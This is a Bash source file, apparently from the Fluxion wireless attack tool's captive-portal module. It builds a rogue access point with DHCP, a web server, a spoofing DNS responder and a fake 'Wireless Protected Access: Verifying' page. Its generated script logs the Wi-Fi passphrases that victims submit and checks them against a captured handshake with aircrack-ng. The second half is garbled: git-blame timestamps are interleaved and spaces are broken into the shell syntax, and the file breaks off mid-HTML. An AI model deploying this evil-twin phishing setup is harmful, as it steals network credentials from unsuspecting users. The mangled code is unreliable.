#!/bin/bash
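############################# < Captive Portal Parameters > ############################
# NOTE: the page extraction inserted spaces around "=" and inside the
# expansions; they are removed here so the assignments are valid shell.
CaptivePortalState="Not Ready"

# Log directories. The generated authenticator script appends submitted
# passphrases to files under these paths in clear text, so anything stored
# here is sensitive engagement data: restrict access and purge it afterwards.
CaptivePortalPassLog="$FLUXIONPath/attacks/Captive Portal/pwdlog"
CaptivePortalNetLog="$FLUXIONPath/attacks/Captive Portal/netlog"

CaptivePortalJamTime="9999999999999"

# Verification methods offered to the operator; index-aligned with the Info array.
CaptivePortalAuthenticationMethods=("hash") # "wpa_supplicant")
CaptivePortalAuthenticationMethodsInfo=("(handshake file, ${CGrn}recommended$CClr)") # "(Target AP authentication, slow)")

########################### < Virtual Network Configuration > ##########################
# To avoid colliding with an already connected network, we use an uncommon subnet.
VIGWAddress="192.168.254.1"
# First three octets of the gateway address (strips the last ".N").
VIGWNetwork=${VIGWAddress%.*}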
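#######################################
# Release the access-point interface reserved for the captive portal.
# Globals:   WIAccessPoint (read, cleared), FLUXIONOutputDevice (read)
# Returns:   1 when no access-point interface is currently set.
#######################################
function captive_portal_unset_interface() {
  if [ ! "$WIAccessPoint" ]; then return 1; fi

  # Only wireless interfaces have an AP service to tear down.
  if interface_is_wireless "$WIAccessPoint"; then
    fluxion_unset_ap_service
  fi

  # Remove any previously created fluxion AP interfaces.
  iw dev "$WIAccessPoint" del &>"$FLUXIONOutputDevice"

  WIAccessPoint=""
}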
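#######################################
# Ask the operator for the interface to use as access point and reserve it.
# Globals:   WIAccessPoint (read, written), WIMonitor (read),
#            InterfacePromptIfSelected, InterfacePrompt,
#            CaptivePortalRunInterface, FluxionRunInterface (read)
# Returns:   0 when an interface is (already) set,
#            1 when the virtual interface or the AP service could not be set,
#            2 when fluxion_run_interface failed.
#######################################
function captive_portal_set_interface() {
  if [ "$WIAccessPoint" ]; then return 0; fi

  captive_portal_unset_interface

  # Gather candidate interfaces.
  echo -e "$FLUXIONVLine $FLUXIONFindingWINotice"

  # List of all valid network interfaces.
  interface_list_real

  # Extra menu entry (repeat) and its index-aligned info/state/color columns.
  local ifAlternate=("$FLUXIONGeneralRepeatOption")
  local ifAlternateInfo=("")
  local ifAlternateState=("")
  local ifAlternateColor=("$CClr")

  interface_prompt "$FLUXIONVLine $CaptivePortalInterfaceQuery" "InterfaceListWireless[@]" \
    "ifAlternate[@]" "ifAlternateInfo[@]" "ifAlternateState[@]" "ifAlternateColor[@]"

  # If the monitor interface is also the AP interface,
  # there's no need to reserve it again, just add it.
  if [ "$InterfacePromptIfSelected" == "$WIMonitor" ]; then
    if ! captive_portal_run_interface "$InterfacePromptIfSelected"; then
      return 1
    fi
    WIAccessPoint="$CaptivePortalRunInterface"
  else
    # NOTE(review): this branch passes $InterfacePrompt while the comparison
    # above reads $InterfacePromptIfSelected; confirm which variable
    # interface_prompt actually sets before relying on this path.
    if ! fluxion_run_interface "$InterfacePrompt"; then
      return 2
    fi
    WIAccessPoint="$FluxionRunInterface"
  fi

  # Set an AP service if the interface selected is wireless.
  if interface_is_wireless "$WIAccessPoint"; then
    if ! fluxion_set_ap_service; then
      captive_portal_unset_interface
      return 1
    fi
  fi
}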
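#######################################
# Create a virtual interface on the physical device behind interface $1.
# Globals:   InterfacePhysical (read), CaptivePortalRunInterface (written),
#            FLUXIONOutputDevice (read)
# Arguments: $1 - name of an existing interface
# Returns:   1 when $1 is empty or its physical device is unknown,
#            3 when iw could not add the virtual interface.
#######################################
function captive_portal_run_interface() {
  if [ ! "$1" ]; then return 1; fi

  # Create an identifier for the access point, AP virtual interface:
  # "FX" + the interface name without its first two characters + "AP".
  local wiAccessPoint="FX${1:2}AP"

  # Find interface's physical device.
  if ! interface_physical "$1"; then
    echo -e "$FLUXIONVLine $FLUXIONPhysicalWIDeviceUnknownError"
    sleep 5
    return 1
  fi

  local wiAccessPointDevice="$InterfacePhysical"

  # Create the new virtual interface with the generated identifier.
  echo -e "$FLUXIONVLine $CaptivePortalStartingInterfaceNotice"
  if ! iw phy "$wiAccessPointDevice" interface add "$wiAccessPoint" type monitor 2>"$FLUXIONOutputDevice"; then
    echo -e "$FLUXIONVLine $CaptivePortalCannotStartInterfaceError"
    sleep 5
    return 3
  fi

  echo -e "$FLUXIONVLine $CaptivePortalStartedInterfaceNotice"
  sleep 3

  # Hand the new interface name back to the caller through a global.
  CaptivePortalRunInterface="$wiAccessPoint"
}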
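#######################################
# Clear the selected verification method and undo what it set up.
# Globals:   APRogueAuthMode (read, cleared),
#            CaptivePortalAuthenticationMethods (read)
# Returns:   0 when no method was set.
#######################################
function captive_portal_unset_auth() {
  if [ ! "$APRogueAuthMode" ]; then return 0; fi

  if [ "$APRogueAuthMode" = "hash" ]; then
    fluxion_unset_hash
  fi

  APRogueAuthMode=""

  # If we've only got one option, then the user skipped this
  # section by taking that one option, so we unset the previous
  # phase along with this one to take the user properly back.
  if [ "${#CaptivePortalAuthenticationMethods[@]}" -le 1 ]; then
    captive_portal_unset_interface
  fi
}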
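#######################################
# Select the verification method (APRogueAuthMode) and prepare it.
# Globals:   APRogueAuthMode (read, written), FLUXIONAuto (read),
#            CaptivePortalAuthenticationMethods[,Info] (read),
#            IOQueryFormatFields (read), FLUXIONOutputDevice (read)
# Returns:   0 when a method is (already) set,
#            1 when the operator chose "back" or fluxion_set_hash failed.
#######################################
function captive_portal_set_auth() {
  if [ "$APRogueAuthMode" ]; then
    echo "Captive Portal authentication mode is already set, skipping!" >"$FLUXIONOutputDevice"
    return 0
  fi

  captive_portal_unset_auth

  local methodCount=${#CaptivePortalAuthenticationMethods[@]}

  # Take the first method without asking when it is the only one, or when
  # running in auto mode with at least one method available.
  if [ "$methodCount" -eq 1 ] ||
    { [ "$methodCount" -ge 1 ] && [ "$FLUXIONAuto" ]; }; then
    APRogueAuthMode="${CaptivePortalAuthenticationMethods[0]}"
  else
    fluxion_header

    echo -e "$FLUXIONVLine $CaptivePortalVerificationMethodQuery"
    echo

    view_target_ap_info

    local choices=("${CaptivePortalAuthenticationMethods[@]}" "$FLUXIONGeneralBackOption")
    io_query_format_fields "" "\t$CRed[$CYel%d$CRed]$CClr %b %b\n" "choices[@]" \
      "CaptivePortalAuthenticationMethodsInfo[@]"

    echo

    APRogueAuthMode="${IOQueryFormatFields[0]}"

    if [[ "$APRogueAuthMode" = "$FLUXIONGeneralBackOption" ]]; then
      captive_portal_unset_auth
      return 1
    fi
  fi

  # The original tested $? after the if-block; checking the call directly
  # is equivalent and does not depend on what ran last.
  if [ "$APRogueAuthMode" = "hash" ]; then
    if ! fluxion_set_hash; then
      captive_portal_unset_auth
      return 1
    fi
  fi
}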
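#######################################
# Generate a self-signed certificate and key into the workspace.
# Globals:   FLUXIONWorkspacePath (read)
# Outputs:   $FLUXIONWorkspacePath/server.pem (key and certificate together)
# Returns:   status of the final chmod.
#######################################
function captive_portal_run_certificate_generator() {
  # -nodes leaves the private key unencrypted and -keyout/-out point at the
  # same file, so the key sits next to the certificate. The restrictive umask
  # keeps the file from being group/world readable before chmod runs.
  # The subject is fixed, so certificates produced here share the same DN.
  # More details: https://www.openssl.org/docs/manmaster/apps/openssl.html
  (
    umask 077
    xterm -bg "#000000" -fg "#CCCCCC" \
      -title "Generating Self-Signed SSL Certificate" \
      -e openssl req \
      -subj '/CN=captive.router.lan/O=CaptivePortal/OU=Networking/C=US' \
      -new -newkey rsa:2048 -days 365 -nodes -x509 \
      -keyout "$FLUXIONWorkspacePath/server.pem" \
      -out "$FLUXIONWorkspacePath/server.pem"
  )

  chmod 400 "$FLUXIONWorkspacePath/server.pem"
}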
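# Remove the workspace copy of the certificate/key file.
# Globals: FLUXIONWorkspacePath (read)
function captive_portal_unset_cert() {
  sandbox_remove_workfile "$FLUXIONWorkspacePath/server.pem"
}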
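#######################################
# Make sure the workspace holds a non-empty server.pem, copying a
# pre-supplied one or generating a self-signed one.
# Globals:   FLUXIONPath, FLUXIONWorkspacePath, FLUXIONAuto,
#            FLUXIONOutputDevice, IOQueryChoice (read)
# Returns:   0 when a certificate is (already) set or was generated,
#            1 when the operator chose "back", 2 for "rescan",
#            3 for an unrecognised choice.
#######################################
function captive_portal_set_cert() {
  local suppliedCert="$FLUXIONPath/attacks/Captive Portal/certificate/server.pem"
  local workspaceCert="$FLUXIONWorkspacePath/server.pem"

  # Check existence of a supplied ssl certificate with file size > 0.
  if [ -f "$suppliedCert" ] && [ -s "$suppliedCert" ]; then
    cp "$suppliedCert" "$workspaceCert"
  fi

  # Check existence of the workspace ssl certificate with file size > 0.
  if [ -f "$workspaceCert" ] && [ -s "$workspaceCert" ]; then
    echo "Captive Portal certificate is already set, skipping!" >"$FLUXIONOutputDevice"
    return 0
  fi

  captive_portal_unset_cert

  if [ "$FLUXIONAuto" ]; then
    captive_portal_run_certificate_generator
  else
    local choices=("$CaptivePortalCertificateSourceGenerateOption" "$CaptivePortalCertificateSourceRescanOption" "$FLUXIONGeneralBackOption")

    # Keep asking until a non-empty certificate file exists.
    while [ ! -f "$workspaceCert" ] || [ ! -s "$workspaceCert" ]; do
      io_query_choice "$CaptivePortalCertificateSourceQuery" "choices[@]"

      echo

      case "$IOQueryChoice" in
        "$CaptivePortalCertificateSourceGenerateOption")
          captive_portal_run_certificate_generator
          break
          ;;
        "$CaptivePortalCertificateSourceRescanOption")
          return 2
          ;;
        "$FLUXIONGeneralBackOption")
          captive_portal_unset_auth
          captive_portal_unset_cert
          return 1
          ;;
        *)
          conditional_bail
          return 3
          ;;
      esac
    done
  fi
}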
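# Remove the workspace copy of the selected portal site.
# Globals: FLUXIONWorkspacePath (read)
function captive_portal_unset_site() {
  sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal"
}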
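#######################################
# Let the operator pick a portal site and stage it in the workspace.
# Globals:   FLUXIONPath, FLUXIONWorkspacePath, FLUXIONOutputDevice,
#            APTargetSSID, APTargetMAC, APTargetChannel,
#            IOQueryFormatFields, FormatCenterDynamic (read)
# Returns:   0 when a site is already staged, 1 when the operator chose "back".
#######################################
function captive_portal_set_site() {
  if [ -d "$FLUXIONWorkspacePath/captive_portal" ]; then
    echo "Captive Portal site (interface) is already set, skipping!" >"$FLUXIONOutputDevice"
    return 0
  fi

  captive_portal_unset_site

  local sites=()
  local site

  # NOTE(review): the two listings below use paths relative to the current
  # directory, while the case branches further down use $FLUXIONPath; confirm
  # the script always runs from $FLUXIONPath.

  # Attempt adding only if the directory exists.
  if [ -d attacks/Captive\ Portal/generic/languages ]; then
    # Retrieve all generic sites available.
    for site in attacks/Captive\ Portal/generic/languages/*.lang; do
      # An unmatched glob stays literal; skip it instead of listing "*".
      [ -e "$site" ] || continue
      sites+=("${CaptivePortalGenericInterfaceOption}_$(basename "${site%.lang}")")
    done
  fi

  # Attempt adding only if the directory exists.
  if [ -d attacks/Captive\ Portal/sites ]; then
    # Retrieve all available portal sites and
    # store them without the .portal extension.
    for site in attacks/Captive\ Portal/sites/*.portal; do
      [ -e "$site" ] || continue
      sites+=("$(basename "${site%.portal}")")
    done
  fi

  # Entries are "<identifier>_<language>": split them into two menu columns.
  local sitesIdentifier=("${sites[@]/_*/}" "$FLUXIONGeneralBackOption")
  local sitesLanguage=("${sites[@]/*_/}")

  format_center_dynamic "$CRed[$CYel%02d$CRed]$CClr %-44b $CBlu%10s$CClr"
  local queryFieldOptionsFormat=$FormatCenterDynamic

  fluxion_header

  echo -e "$FLUXIONVLine $CaptivePortalUIQuery"
  echo

  view_target_ap_info

  io_query_format_fields "" "$queryFieldOptionsFormat\n" \
    "sitesIdentifier[@]" "sitesLanguage[@]"

  echo

  site="${IOQueryFormatFields[0]}"
  local siteLanguage="${IOQueryFormatFields[1]}"
  local sitePath="${site}_${siteLanguage}"

  case "$site" in
    "$CaptivePortalGenericInterfaceOption")
      source "$FLUXIONPath/attacks/Captive Portal/generic/languages/$siteLanguage.lang"
      captive_portal_generic
      ;;
    "$FLUXIONGeneralBackOption")
      captive_portal_unset_cert
      captive_portal_unset_site
      return 1
      ;;
    *)
      cp -r "$FLUXIONPath/attacks/Captive Portal/sites/$sitePath.portal" \
        "$FLUXIONWorkspacePath/captive_portal"

      # Fill the site templates with the target's details.
      # NOTE(review): only "/" is escaped before the values are spliced into
      # the sed replacement; "&", "\" or a newline in a value (the SSID is
      # presumably taken from a scan, i.e. not under the operator's control)
      # would alter the substitution. Escape those too before trusting it.
      find "$FLUXIONWorkspacePath/captive_portal/" -type f -exec \
        sed -i -e 's/$APTargetSSID/'"${APTargetSSID//\//\\\/}"'/g; s/$APTargetMAC/'"${APTargetMAC//\//\\\/}"'/g; s/$APTargetChannel/'"${APTargetChannel//\//\\\/}"'/g' {} \;
      ;;
  esac
}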
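#######################################
# Remove the files generated for the attack and reset the AP service.
# Globals:   FLUXIONWorkspacePath (read)
#######################################
function captive_portal_unset_attack() {
  sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal_authenticator.sh"
  sandbox_remove_workfile "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py"
  sandbox_remove_workfile "$FLUXIONWorkspacePath/lighttpd.conf"
  # dhcpd.conf is written alongside dhcpd.leases by captive_portal_set_attack
  # but was never cleaned up; remove it with the rest.
  sandbox_remove_workfile "$FLUXIONWorkspacePath/dhcpd.conf"
  sandbox_remove_workfile "$FLUXIONWorkspacePath/dhcpd.leases"
  sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal/check.php"
  sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal"

  # Only reset the AP if one has been defined.
  if [ "$(type -t ap_reset)" ]; then
    ap_reset
  fi
}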
# Create different settings required for the script
function captive_portal_set_attack( ) {
# AP Service: Prepare service for an attack.
ap_prep
2017-08-15 13:30:04 -06:00
# Add the PHP authenticator scripts, used to verify
2017-08-08 12:48:00 -06:00
# password attempts from users using the web interface.
2017-08-15 13:30:04 -06:00
local authenticatorFiles = ( "authenticator.php" "check.php" "update.php" )
2017-08-15 18:57:04 -06:00
2017-08-15 13:30:04 -06:00
for authenticatorFile in " ${ authenticatorFiles [@] } " ; do
cp " $FLUXIONPath /attacks/Captive Portal/lib/ $authenticatorFile " \
" $FLUXIONWorkspacePath /captive_portal/ $authenticatorFile "
2017-08-15 18:57:04 -06:00
sed -i -e 's/\$FLUXIONWorkspacePath/' " ${ FLUXIONWorkspacePath // \/ / \\ \/ } " '/g' \
2017-08-15 13:30:04 -06:00
" $FLUXIONWorkspacePath /captive_portal/ $authenticatorFile "
chmod u+x " $FLUXIONWorkspacePath /captive_portal/ $authenticatorFile "
done
2017-08-08 12:48:00 -06:00
# Generate the dhcpd configuration file, which is
# used to provide DHCP service to APRogue clients.
echo " \
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet $VIGWNetwork .0 netmask 255.255.255.0 {
option broadcast-address $VIGWNetwork .255;
option routers $VIGWAddress ;
option subnet-mask 255.255.255.0;
option domain-name-servers $VIGWAddress ;
range $VIGWNetwork .100 $VIGWNetwork .254;
} \
2017-08-09 18:31:32 -06:00
" > " $FLUXIONWorkspacePath /dhcpd.conf"
2017-08-08 12:48:00 -06:00
#create an empty leases file
2017-08-09 18:31:32 -06:00
touch " $FLUXIONWorkspacePath /dhcpd.leases "
2017-08-08 12:48:00 -06:00
# Generate configuration for a lighttpd web-server.
echo " \
server.document-root = \" $FLUXIONWorkspacePath /captive_portal/\"
server.modules = (
\" mod_access\" ,
\" mod_alias\" ,
\" mod_accesslog\" ,
\" mod_fastcgi\" ,
\" mod_redirect\" ,
\" mod_rewrite\"
)
fastcgi.server = (
\" .php\" = > (
(
\" bin-path\" = > \" /usr/bin/php-cgi\" ,
\" socket\" = > \" /php.socket\"
)
)
)
server.port = 80
server.pid-file = \" /var/run/lighttpd.pid\"
# server.username = \"www\"
# server.groupname = \"www\"
mimetype.assign = (
\" .html\" = > \" text/html\" ,
\" .htm\" = > \" text/html\" ,
\" .txt\" = > \" text/plain\" ,
\" .jpg\" = > \" image/jpeg\" ,
\" .png\" = > \" image/png\" ,
\" .css\" = > \" text/css\"
)
server.error-handler-404 = \" /\"
static-file.exclude-extensions = (
\" .fcgi\" ,
\" .php\" ,
\" .rb\" ,
\" ~\" ,
\" .inc\"
)
index-file.names = (
\" index.htm\" ,
\" index.html\"
)
\$ SERVER[ \" socket\" ] = = \" :443\" {
ssl.engine = \" enable\"
ssl.pemfile = \" $FLUXIONWorkspacePath /server.pem\"
}
#Redirect www.domain.com to domain.com
\$ HTTP[ \" host\" ] = ~ \" ^www\. ( .*) $\" {
url.redirect = ( \" ^/( .*) \" = > \" http://%1/\$ 1\" )
}
2017-08-09 18:31:32 -06:00
" > " $FLUXIONWorkspacePath /lighttpd.conf"
2017-08-08 12:48:00 -06:00
# Create a DNS service with python, forwarding all traffic to gateway.
echo " \
import socket
class DNSQuery:
def __init__( self, data) :
self.data= data
self.dominio= ''
tipo = ( ord( data[ 2] ) >> 3) & 15
if tipo = = 0:
ini = 12
lon = ord( data[ ini] )
while lon != 0:
self.dominio+= data[ ini+1:ini+lon+1] +'.'
ini += lon+1
lon = ord( data[ ini] )
def respuesta( self, ip) :
packet = ''
if self.dominio:
packet += self.data[ :2] + \" \x 81\x 80\"
packet += self.data[ 4:6] + self.data[ 4:6] + '\x00\x00\x00\x00'
packet += self.data[ 12:]
packet += '\xc0\x0c'
packet += '\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04'
packet += str.join( '' ,map( lambda x: chr( int( x) ) , ip.split( '.' ) ) )
return packet
if __name__ = = '__main__' :
ip = '$VIGWAddress'
print 'pyminifakeDwebconfNS:: dom.query. 60 IN A %s' % ip
udps = socket.socket( socket.AF_INET, socket.SOCK_DGRAM)
udps.bind( ( '' ,53) )
try:
while 1:
data, addr = udps.recvfrom( 1024)
p = DNSQuery( data)
udps.sendto( p.respuesta( ip) , addr)
print 'Request: %s -> %s' % ( p.dominio, ip)
except KeyboardInterrupt:
print 'Finalizando'
udps.close( ) \
2017-08-20 20:38:53 -06:00
" > " $FLUXIONWorkspacePath /fluxion_captive_portal_dns.py"
2017-08-08 12:48:00 -06:00
2017-08-20 20:38:53 -06:00
chmod +x " $FLUXIONWorkspacePath /fluxion_captive_portal_dns.py "
2017-08-08 12:48:00 -06:00
# Attack arbiter script
echo " \
#!/bin/bash
function signal_stop_attack( ) {
kill -s SIGABRT $$ # Signal STOP ATTACK
2017-08-18 10:12:38 -06:00
handle_abort_authenticator
2017-08-08 12:48:00 -06:00
}
function handle_abort_authenticator( ) {
AuthenticatorState = \" aborted\"
}
trap signal_stop_attack SIGINT SIGHUP
trap handle_abort_authenticator SIGABRT
2017-08-09 18:31:32 -06:00
echo > \" $FLUXIONWorkspacePath /candidate.txt\"
echo -n \" 0\" > \" $FLUXIONWorkspacePath /hit.txt\"
echo > \" $FLUXIONWorkspacePath /wpa_supplicant.log\"
2017-08-08 12:48:00 -06:00
# Make console cursor invisible, cnorm to revert.
tput civis
clear
m = 0
h = 0
s = 0
i = 0
AuthenticatorState = \" running\"
startTime = \$ ( date +%s)
while [ \$ AuthenticatorState = \" running\" ] ; do
let s = \$ ( date +%s) -\$ startTime
d = \` expr \$ s / 86400\`
s = \` expr \$ s % 86400\`
h = \` expr \$ s / 3600\`
s = \` expr \$ s % 3600\`
m = \` expr \$ s / 60\`
s = \` expr \$ s % 60\`
if [ \" \$ s\" -le 9 ] ; then
is = \" 0\"
else
is =
fi
if [ \" \$ m\" -le 9 ] ; then
im = \" 0\"
else
im =
fi
if [ \" \$ h\" -le 9 ] ; then
ih = \" 0\"
else
ih =
fi
2017-08-09 18:31:32 -06:00
if [ -f \" $FLUXIONWorkspacePath /pwdattempt.txt\" -a -s \" $FLUXIONWorkspacePath /pwdattempt.txt\" ] ; then
# Assure we've got a directory to store pwd logs into.
if [ ! -d \" $CaptivePortalPassLog \" ] ; then
mkdir -p \" $CaptivePortalPassLog \"
fi
2017-08-08 12:48:00 -06:00
# Save any new password attempt.
2017-08-09 18:31:32 -06:00
cat \" $FLUXIONWorkspacePath /pwdattempt.txt\" >> \" $CaptivePortalPassLog /$APTargetSSID -$APTargetMAC .log\"
2017-08-08 12:48:00 -06:00
# Clear logged password attempt.
2017-08-09 18:31:32 -06:00
echo -n > \" $FLUXIONWorkspacePath /pwdattempt.txt\"
2017-08-08 12:48:00 -06:00
fi
2017-08-09 18:31:32 -06:00
" >> " $FLUXIONWorkspacePath /captive_portal_authenticator.sh"
2017-08-08 12:48:00 -06:00
if [ $APRogueAuthMode = "hash" ] ; then
echo "
2017-08-09 18:31:32 -06:00
if [ -f \" $FLUXIONWorkspacePath /candidate_result.txt\" ] ; then
2017-08-08 12:48:00 -06:00
# Check if we've got the correct password by looking for anything other than \"Passphrase not in\".
2017-08-09 18:31:32 -06:00
if ! aircrack-ng -w \" $FLUXIONWorkspacePath /candidate.txt\" \" $FLUXIONWorkspacePath /$APTargetSSIDClean -$APTargetMAC .cap\" | grep -qi \" Passphrase not in\" ; then
echo \" 2\" > \" $FLUXIONWorkspacePath /candidate_result.txt\"
2017-08-08 12:48:00 -06:00
break
else
2017-08-09 18:31:32 -06:00
echo \" 1\" > \" $FLUXIONWorkspacePath /candidate_result.txt\"
2017-08-08 12:48:00 -06:00
fi
2017-08-09 18:31:32 -06:00
fi " >> " $FLUXIONWorkspacePath /captive_portal_authenticator.sh"
2017-08-08 12:48:00 -06:00
elif [ $APRogueAuthMode = "wpa_supplicant" ] ; then
echo "
2017-08-09 18:31:32 -06:00
wpa_passphrase \" $APTargetSSID \" \" \` cat \" $FLUXIONWorkspacePath /candidate.txt\" \` \" > \" $FLUXIONWorkspacePath /wpa_supplicant.conf\"
wpa_supplicant -i \" $WIAccessPoint \" -c \" $FLUXIONWorkspacePath /wpa_supplicant.conf\" -f \" $FLUXIONWorkspacePath /wpa_supplicant.log\" &
2017-08-08 12:48:00 -06:00
wpaSupplicantPID = \$ !
# Shitty design...
sleep 5
2017-08-09 18:31:32 -06:00
if [ -f \" $FLUXIONWorkspacePath /candidate_result.txt\" ] ; then
if grep -i 'WPA: Key negotiation completed' \" $FLUXIONWorkspacePath /wpa_supplicant.log\" ; then
echo \" 2\" > \" $FLUXIONWorkspacePath /candidate_result.txt\"
2017-08-08 12:48:00 -06:00
break
else
2017-08-09 18:31:32 -06:00
echo \" 1\" > \" $FLUXIONWorkspacePath /candidate_result.txt\"
2017-08-08 12:48:00 -06:00
fi
2017-08-09 18:31:32 -06:00
fi " >> " $FLUXIONWorkspacePath /captive_portal_authenticator.sh"
2017-08-08 12:48:00 -06:00
fi
echo "
DHCPClients = ( $( nmap -PR -sn -n -oG - $VIGWNetwork .100-110 2>& 1 | grep Host) )
echo
echo -e \" ACCESS POINT:\"
2017-08-20 13:04:22 -06:00
echo -e \" SSID ...........: $CWht $APTargetSSID $CClr \"
echo -e \" MAC ............: $CYel $APTargetMAC $CClr \"
echo -e \" Channel ........: $CWht $APTargetChannel $CClr \"
echo -e \" Vendor .........: $CGrn ${ APTargetMaker :- UNKNOWN } $CClr \"
echo -e \" Runtime ........: $CBlu \$ ih\$ h:\$ im\$ m:\$ is\$ s$CClr \"
echo -e \" Attempts .......: $CRed \$ ( cat $FLUXIONWorkspacePath /hit.txt) $CClr \"
echo -e \" Clients ........: $CBlu \$ ( cat $FLUXIONWorkspacePath /clients.txt | grep DHCPACK | awk '{print \$5}' | sort| uniq | wc -l) $CClr \"
2017-08-08 12:48:00 -06:00
echo
echo -e \" CLIENTS ONLINE:\"
x = 0
for client in \" \$ { DHCPClients[ @] } \" ; do
x = \$ ( ( \$ x+1) )
ClientIP = \$ ( echo \$ client| cut -d \" \" -f2)
ClientMAC = \$ ( nmap -PR -sn -n \$ ClientIP 2>& 1 | grep -i mac | awk '{print \$3}' | tr [ :upper:] [ :lower:] )
if [ \" \$ ( echo \$ ClientMAC| wc -m) \" != \" 18\" ] ; then
ClientMAC = \" xx:xx:xx:xx:xx:xx\"
fi
ClientMID = \$ ( macchanger -l | grep \" \$ ( echo \" \$ ClientMAC\" | cut -d \" :\" -f -3) \" | cut -d \" \" -f 5-)
if echo \$ ClientMAC| grep -q x; then
ClientMID = \" unknown\"
fi
2017-08-09 18:31:32 -06:00
ClientHostname = \$ ( grep \$ ClientIP \" $FLUXIONWorkspacePath /clients.txt\" | grep DHCPACK | sort | uniq | head -1 | grep '(' | awk -F '(' '{print \$2}' | awk -F ')' '{print \$1}' )
2017-08-08 12:48:00 -06:00
echo -e \" $CGrn \$ x) $CRed \$ ClientIP $CYel \$ ClientMAC $CClr ( $CBlu \$ ClientMID$CClr ) $CGrn \$ ClientHostname$CClr \"
done
2017-08-09 18:31:32 -06:00
echo -ne \" \0 33[ K\0 33[ u\" " >> " $FLUXIONWorkspacePath /captive_portal_authenticator.sh"
2017-08-08 12:48:00 -06:00
if [ $APRogueAuthMode = "hash" ] ; then
echo "
2017-08-09 18:31:32 -06:00
sleep 1" >> " $FLUXIONWorkspacePath /captive_portal_authenticator.sh"
2017-08-08 12:48:00 -06:00
elif [ $APRogueAuthMode = "wpa_supplicant" ] ; then
echo "
killall \$ wpaSupplicantPID & > $FLUXIONOutputDevice
2017-08-09 18:31:32 -06:00
" >> " $FLUXIONWorkspacePath /captive_portal_authenticator.sh"
2017-08-08 12:48:00 -06:00
fi
echo "
done
if [ \$ AuthenticatorState = \" aborted\" ] ; then exit 1; fi
clear
2017-08-09 18:31:32 -06:00
echo \" 1\" > \" $FLUXIONWorkspacePath /status.txt\"
2017-08-08 12:48:00 -06:00
# sleep 7
sleep 3
signal_stop_attack
# killall mdk3 &> $FLUXIONOutputDevice
# killall aireplay-ng &> $FLUXIONOutputDevice
# killall airbase-ng &> $FLUXIONOutputDevice
2017-08-20 20:38:53 -06:00
# kill \$(ps a | grep python | grep fluxion_captive_portal_dns.py | awk '{print \$1}') &> $FLUXIONOutputDevice
2017-08-08 12:48:00 -06:00
# killall hostapd &> $FLUXIONOutputDevice
# killall lighttpd &> $FLUXIONOutputDevice
# killall dhcpd &> $FLUXIONOutputDevice
# if [ \"$APRogueAuthMode\" = \"wpa_supplicant\" ]; then
# killall wpa_supplicant &> $FLUXIONOutputDevice
# fi
# killall wpa_passphrase &> $FLUXIONOutputDevice
2017-08-09 18:31:32 -06:00
# Assure we've got a directory to store net logs into.
if [ ! -d \" $CaptivePortalNetLog \" ] ; then
mkdir -p \" $CaptivePortalNetLog \"
fi
2017-08-08 12:48:00 -06:00
echo \"
FLUXION $FLUXIONVersion
SSID: $APTargetSSID
BSSID: $APTargetMAC ( $APTargetMaker )
Channel: $APTargetChannel
Security: $APTargetEncryption
Time: \$ ih\$ h:\$ im\$ m:\$ is\$ s
Password: \$ ( cat $FLUXIONWorkspacePath /candidate.txt)
2017-08-09 18:31:32 -06:00
\" >\" $CaptivePortalNetLog /$APTargetSSID -$APTargetMAC .log\" " >> " $FLUXIONWorkspacePath /captive_portal_authenticator.sh"
2017-08-08 12:48:00 -06:00
if [ $APRogueAuthMode = "hash" ] ; then
echo "
2017-08-09 18:31:32 -06:00
aircrack-ng -a 2 -b $APTargetMAC -0 -s \" $FLUXIONWorkspacePath /$APTargetSSIDClean -$APTargetMAC .cap\" -w \" $FLUXIONWorkspacePath /candidate.txt\" && echo && echo -e \" The password was saved in " $CRed " $CaptivePortalNetLog /$APTargetSSID -$APTargetMAC .log" $CClr " \" \
" >> " $FLUXIONWorkspacePath /captive_portal_authenticator.sh"
2017-08-08 12:48:00 -06:00
elif [ $APRogueAuthMode = "wpa_supplicant" ] ; then
echo "
echo -e \" The password was saved in " $CRed " $CaptivePortalNetLog /$APTargetSSID -$APTargetMAC .log" $CClr " \" \
2017-08-09 18:31:32 -06:00
" >> " $FLUXIONWorkspacePath /captive_portal_authenticator.sh"
2017-08-08 12:48:00 -06:00
fi
2017-08-09 18:31:32 -06:00
chmod +x " $FLUXIONWorkspacePath /captive_portal_authenticator.sh "
2017-08-08 12:48:00 -06:00
}
# Generate the contents for a generic web interface
function captive_portal_generic( ) {
2017-08-09 18:31:32 -06:00
if [ ! -d " $FLUXIONWorkspacePath /captive_portal " ] ; then
mkdir " $FLUXIONWorkspacePath /captive_portal "
2017-08-08 12:48:00 -06:00
fi
2017-08-21 09:18:31 -06:00
base64 -d " $FLUXIONPath /attacks/Captive Portal/generic/assets " > " $FLUXIONWorkspacePath /file.zip "
2017-08-08 12:48:00 -06:00
2017-08-09 18:31:32 -06:00
unzip " $FLUXIONWorkspacePath /file.zip " -d " $FLUXIONWorkspacePath /captive_portal " & >$FLUXIONOutputDevice
2017-08-08 12:48:00 -06:00
sandbox_remove_workfile " $FLUXIONWorkspacePath /file.zip "
echo " \
<!DOCTYPE html>
<html>
<head>
<meta charset = \" UTF-8\" >
<meta name = \" viewport\" content = \" width = device-width, height = device-height, initial-scale= 1.0\" >
<title>Wireless Protected Access: Verifying</title>
<!-- Styles -->
<link rel = \" stylesheet\" type = \" text/css\" href = \" css/jquery.mobile-1.4.5.min.css\" />
<link rel = \" stylesheet\" type = \" text/css\" href = \" css/main.css\" />
<!-- Scripts -->
<script src = \" js/jquery-1.11.1.min.js\" ></script>
<script src = \" js/jquery.mobile-1.4.5.min.js\" ></script>
</head>
<body>
<!-- final page -->
<div id = \" done \" data-role= \" page\" data-theme= \" a\" >
<div data-role= \" main\" class = \" ui-content ui-body ui-body-b\" dir = \" $DIALOG_WEB_DIR \" >
<h3 style = \" text-align:center; \" >$DIALOG_WEB_OK </h3>
</div>
</div>
</body>
2017-08-09 18:31:32 -06:00
</html>" > " $FLUXIONWorkspacePath /captive_portal/final.html"
2017-08-08 12:48:00 -06:00
echo " \
<!DOCTYPE html>
<html>
<head>
<meta charset = \" UTF-8\" >
<meta name = \" viewport\" content = \" width = device-width, height = device-height, initial-scale= 1.0\" >
